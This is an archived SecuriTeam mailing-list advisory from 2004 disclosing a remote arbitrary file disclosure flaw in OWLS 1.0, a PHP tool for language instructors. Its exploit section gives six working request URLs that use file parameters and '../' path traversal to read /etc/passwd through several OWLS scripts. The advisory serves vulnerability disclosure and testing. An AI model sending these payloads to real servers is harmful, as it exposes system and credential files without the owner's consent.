[UNIX] OWLS Remote Arbitrary Files Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 02/18/04
- Previous message: SecuriTeam: "[NEWS] APC 9606 SmartSlot Web/SNMP Management Card Backdoor"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 18 Feb 2004 16:28:25 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
OWLS Remote Arbitrary Files Disclosure
------------------------------------------------------------------------
SUMMARY
" <http://www.foolsworkshop.com/owls/> OWLS is a web-based environment for
instructors of language to easily create exercises, readings, glossaries,
and present media for their students. Once installed on a web server that
supports PHP, instructors can create materials or upload media for
presentation to their students through a simple form based interface". A
vulnerability in the product allows remote attackers to disclosure files
that would be otherwise inaccessible.
DETAILS
Vulnerable Systems:
* OWLS version 1.0
There is a vulnerability in the current version of OWLS that allows an
attacker to retrieve arbitrary files from the web server with its
privileges.
Exploit:
Any of the following URLs can be used to test your system for the
mentioned vulnerability:
http://address/owls/glossaries/index.php?file=/etc/passwd
http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://address/owls/readings/index.php?filename=/etc/passwd
http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
ADDITIONAL INFORMATION
The information has been provided by <mailto:g00db0y@zone-h.org> G00db0y
from Zone-h Security Labs.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] APC 9606 SmartSlot Web/SNMP Management Card Backdoor"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
